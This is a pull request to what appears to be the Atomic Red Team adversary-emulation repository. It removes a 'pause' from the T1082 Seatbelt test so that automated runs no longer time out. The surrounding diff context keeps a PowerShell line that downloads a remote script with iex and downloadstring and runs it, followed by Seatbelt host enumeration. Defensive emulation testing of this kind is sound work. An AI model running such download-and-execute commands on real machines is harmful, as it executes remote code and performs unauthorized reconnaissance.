### PR TITLE
Bug fix: Removed 'pause' from T1082 Seatbelt atomic that causes timeout

### DIFF
--- a/atomics/T1082/T1082.yaml
+++ b/atomics/T1082/T1082.yaml
@@ -295,7 +295,7 @@ atomic_tests:
   executor:
     command: |-
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
-      Invoke-Seatbelt -Command "-group=all"; pause
+      Invoke-Seatbelt -Command "-group=all"
     name: powershell
 - name: Azure Security Scan with SkyArk
   auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594


### PR DESCRIPTION
**Details:**

The T1082 atomic `WinPwn - PowerSharpPack - Seatbelt` leverages the below command in its execution:
```
Invoke-Seatbelt -Command "-group=all"; pause
```
By default this `pause` function waits for user input (presumably so the user can see the results) and when run with `Invoke-AtomicRedTeam` causes the test to timeout.

This PR removes the `pause` command, with other options available (such as `Invoke-AtomicRedTeam`'s logging modules) to log the output of Seatbelt if this is the purpose of running the test.